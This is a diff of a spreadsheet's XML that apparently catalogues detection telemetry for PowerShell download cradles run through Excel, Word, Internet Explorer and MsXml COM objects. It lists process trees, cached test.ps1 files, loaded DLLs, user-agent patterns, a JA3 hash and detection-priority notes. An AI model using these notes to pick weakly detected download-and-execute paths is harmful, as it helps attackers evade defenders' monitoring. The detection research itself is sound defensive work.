--- a/other/DownloadCradle/DownloadCradle.xlsx
+++ b/other/DownloadCradle/DownloadCradle.xlsx
@@ -9,7 +9,7 @@
     </mc:Choice>
   </mc:AlternateContent>
   <bookViews>
-    <workbookView xWindow="760" yWindow="460" windowWidth="28040" windowHeight="17540" firstSheet="6" activeTab="6"/>
+    <workbookView xWindow="760" yWindow="460" windowWidth="28040" windowHeight="17540" firstSheet="1" activeTab="1"/>
   </bookViews>
   <sheets>
     <sheet name="Methodology" sheetId="4" r:id="rId1"/>
@@ -37,7 +37,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="499" uniqueCount="194">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="651" uniqueCount="226">
   <si>
     <t>None</t>
   </si>
@@ -86,30 +86,7 @@
     <t>Child: Powershell.exe</t>
   </si>
   <si>
-    <t>The fact that PowerShell MsXml COM Object interactions is not proxy aware mens this is low priorty to consider detection</t>
-  </si>
-  <si>
     <t>iexplore.exe lots of noise,  no unusal activity</t>
-  </si>
-  <si>
-    <r>
-      <t xml:space="preserve">Results
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>• Priliminary network results gatherd from wireshark normalised removing versioning
-• Endpoint results gathered from Splunk
-• Process tree - confirm correct GUID by starting at EventCode = 1 and match CommandLine and Image fields
-• File write by process GUID
-• Prefetch review (if required)
-• Repeat process to confirm and understand behaviours
-• Results confirmed and further tested in a live environment to understand network behaviours</t>
-    </r>
   </si>
   <si>
     <t>GET: None
@@ -172,69 +149,6 @@
       <t xml:space="preserve">
 Powershell Version 2+
 Memory Only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Excel.exe writes:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url
-C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
-C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
-e.g
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>C:\Users\Matt.DFIR\AppData\Roaming\Microsoft\Office\Recent\master on raw.githubusercontent.com.url</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">C:\Users\Matt.DFIR\AppData\Roaming\Microsoft\Office\Recent\test.ps1.url
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE\G72KSDID\test[1].ps1
-</t>
     </r>
   </si>
   <si>
@@ -625,143 +539,11 @@
 Child: "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /Automation -Embedding</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Excel.exe writes:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url
-C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
-C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
-e.g
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">C:\Users\Matt.DFIR\AppData\Roaming\Microsoft\Office\Recent\master on raw.githubusercontent.com.url
-C:\Users\Matt.DFIR\AppData\Roaming\Microsoft\Office\Recent\test.ps1.url
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\377803A4.ps1</t>
-    </r>
-  </si>
-  <si>
     <t>Excel.exe</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Iexplore.exe writes:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
-C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
-e.g
-C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4CXURQSD\test[1].txt
-C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\139RVK4W\test[1].ps1</t>
-    </r>
   </si>
   <si>
     <t>JA3_footprint: 769,49172-49171-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
 JA3_hash: cbcd1d81f242de31fd683d5acbc70dca</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Powershell.exe loads:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Credential Delegation Security Package - C:\Windows\System32\credssp.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Fusion 2.5 - C:\Windows\System32\sxs.dll
-Group Policy Client API - C:\Windows\System32\gpapi.dll
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Multi Language Support DLL - C:\Windows\System32\mlang.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-Remote RPC Extension - C:\Windows\System32\RpcRtRemote.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Web Transfer Protocols API - C:\Windows\System32\webio.dll
-Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
-Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Windows HTTP Services - C:\Windows\System32\winhttp.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Windows cryptographic library - C:\Windows\System32\ncrypt.dll
-Winsock2 Helper DLL (TL/IPv4) - C:\Windows\System32\WSHTCPIP.DLL
-Winsock2 Helper DLL (TL/IPv6) - C:\Windows\System32\wship6.dll</t>
-    </r>
   </si>
   <si>
     <r>
@@ -821,73 +603,6 @@
   <si>
     <t>Lots of benigin activity. 
 Potentially could looks at Powershell.exe and HKLM\System\CurrentControlSet\Services\Tcpip\Parameters but this is a commmon and noisy indicator.</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Powershell.exe loads:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Group Policy Client API - C:\Windows\System32\gpapi.dll
-Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
-Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
-Windows cryptographic library - C:\Windows\System32\ncrypt.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Security Support Provider Interface - C:\Windows\System32\security.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Credential Delegation Security Package - C:\Windows\System32\credssp.dll
-Web Transfer Protocols API - C:\Windows\System32\webio.dll
-Windows HTTP Services - C:\Windows\System32\winhttp.dll
-Winsock2 Helper DLL (TL/IPv6) - C:\Windows\System32\wship6.dll
-Winsock2 Helper DLL (TL/IPv4) - C:\Windows\System32\WSHTCPIP.DLL
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Routing Utilities - C:\Windows\System32\rtutils.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Remote Access Connection Manager - C:\Windows\System32\rasman.dll
-Remote Access API - C:\Windows\System32\rasapi32.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>System.Configuration.dll - C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\a2571a4e32a586b52463d88a83702aed\System.Configuration.ni.dll</t>
-    </r>
   </si>
   <si>
     <r>
@@ -2846,58 +2561,6 @@
         <family val="2"/>
         <scheme val="minor"/>
       </rPr>
-      <t>Winword.exe writes:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url
-C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
-C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
-e.g
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>C:\Users\Administrator.DFIR\AppData\Roaming\Microsoft\Office\Recent\master on raw.githubusercontent.com.url
-C:\Users\Administrator.DFIR\AppData\Roaming\Microsoft\Office\Recent\test.ps1.url
-C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8FBE9728-3734-49D6-BAD7-3229A205BA29}.tmp
-C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0000.doc
-C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C99E1E88.ps1
-C:\Users\ADMINI~1.DFI\AppData\Local\Temp\JETD3BB.tmp
-C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E00D4C6D-B039-4EB3-AE43-4C91C7B21FD7}.tmp
-C:\Users\Administrator.DFIR\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
-C:\Users\ADMINI~1.DFI\AppData\Local\Temp\CVRD283.tmp</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
       <t>Powershell.exe loads:</t>
     </r>
     <r>
@@ -3208,56 +2871,6 @@
   </si>
   <si>
     <r>
-      <t xml:space="preserve">Powershell.exe loads:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Credential Delegation Security Package - C:\Windows\System32\credssp.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Fusion 2.5 - C:\Windows\System32\sxs.dll
-Group Policy Client API - C:\Windows\System32\gpapi.dll
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">MSXML 3.0 SP11 - C:\Windows\System32\msxml3.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Net Win32 API Helpers DLL - C:\Windows\System32\netutils.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-Remote RPC Extension - C:\Windows\System32\RpcRtRemote.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Web Transfer Protocols API - C:\Windows\System32\webio.dll
-Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
-Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
-Windows HTTP Services - C:\Windows\System32\winhttp.dll
-Windows cryptographic library - C:\Windows\System32\ncrypt.dll
-Winsock2 Helper DLL (TL/IPv4) - C:\Windows\System32\WSHTCPIP.DLL
-Winsock2 Helper DLL (TL/IPv6) - C:\Windows\System32\wship6.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
       <t xml:space="preserve">Registry object added or deleted (rule: RegistryEvent) by powershell.exe
 </t>
     </r>
@@ -3304,180 +2917,6 @@
 HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask
 HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
 HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing</t>
-    </r>
-  </si>
-  <si>
-    <t xml:space="preserve">
-</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Powershell.exe loads additional modules:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
-Common Controls Library - C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8\comctl32.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Fusion 2.5 - C:\Windows\System32\sxs.dll
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Internet Extensions for Win32 - C:\Windows\System32\wininet.dll
-Microsoft (R) HTML Viewer - C:\Windows\System32\mshtml.dll
-Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
-Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\fa13923a20a9ae44540d6438a1f677b6\Microsoft.PowerShell.Commands.Management.ni.dll
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-OLE32 Extensions for Win32 - C:\Windows\System32\urlmon.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Remote Access API - C:\Windows\System32\rasapi32.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Remote Access Connection Manager - C:\Windows\System32\rasman.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Routing Utilities - C:\Windows\System32\rtutils.dll
-Run time utility for Internet Explorer - C:\Windows\System32\iertutil.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Powershell.exe loads additional modules:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
-Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\fa13923a20a9ae44540d6438a1f677b6\Microsoft.PowerShell.Commands.Management.ni.dll
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Remote Access API - C:\Windows\System32\rasapi32.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Remote Access Connection Manager - C:\Windows\System32\rasman.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Routing Utilities - C:\Windows\System32\rtutils.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
     </r>
   </si>
   <si>
@@ -3653,110 +3092,6 @@
 HEAD: Microsoft Office Excel *
 HEAD: Microsoft Office Existence Discovery
 GET: Mozilla/* (compatible; MSIE *; Windows NT *; Trident/*; .NET*; .NET CLR *; ms-office; MSOffice *)"</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Endpoint:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Powershell.exe loads some network dlls
-Svchost parent to excel.exe, excel.exe connects to internet. Excel writes .url files.
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Network:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Several Useragents and http methods. Good detection filter on bucketting methods by URL over 5 seconds and  alerting on unusual connections.
-OPTIONS: Microsoft Office Excel *
-HEAD: Microsoft Office Excel *
-HEAD: Microsoft Office Existence Discovery
-GET: Mozilla/* (compatible; MSIE *; Windows NT *; Trident/*; .NET*; .NET CLR *; ms-office; MSOffice *)"</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Endpoint:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Powershell.exe loads some network dlls but there does not seem to be common accross versions.
-Svchost parent to word.exe, word.exe connects to internet writes .url files
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">Network:
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Several Useragents and http methods. Good detection filter on bucketting methods by URL over 5 seconds and  alerting on unusual connections. Can be merged with COMexcel to focus on generic COMoffice detection.
-OPTIONS: Microsoft Office Word *
-HEAD: Microsoft Office Word *
-HEAD: Microsoft Office Existence Discovery
-GET: Mozilla/* (compatible; MSIE *; Windows NT *; Trident/*; .NET*; .NET CLR *; ms-office; MSOffice *)</t>
-    </r>
   </si>
   <si>
     <r>
@@ -3996,187 +3331,6 @@
         <b/>
         <sz val="12"/>
         <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Powershell.exe loads additional modules:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-DNS Client API DLL - C:\Windows\System32\dnsapi.dll
-Fusion 2.5 - C:\Windows\System32\sxs.dll
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>winword.exe loads additional modules:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>BranchCache Client Library - C:\Windows\SysWOW64\PeerDist.dll
-Microsoft Access database engine DLL - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACECORE.DLL
-Microsoft Access database engine Expression Service - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACEES.DLL
-Microsoft Access database engine OLE DB Provider - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACEOLEDB.DLL
-Microsoft Access database engine Sort DLL - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\ACEWSTR.DLL
-Microsoft Conversion Library - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\MSCONV97.DLL
-Microsoft Office 2000 component - C:\Windows\SysWOW64\hlink.dll
-Microsoft Office Document Cache - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Csi.dll
-Microsoft UI Automation Core - C:\Windows\SysWOW64\UIAutomationCore.dll
-Microsoft Visual Basic for Applications component - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL
-Microsoft® C Runtime Library - C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\msvcr100.dll
-OLE DB Core Services - C:\Program Files (x86)\Common Files\System\Ole DB\oledb32.dll
-OLE DB Runtime Routines - C:\Windows\SysWOW64\msdart.dll
-Offline Files Win32 API - C:\Windows\SysWOW64\cscapi.dll
-Recover Text Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\RECOVR32.CNV
-SearchFolder - C:\Windows\SysWOW64\SearchFolder.dll
-Shell extensions for sharing - C:\Windows\SysWOW64\ntshrui.dll
-Visual Basic Design Time Environment - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
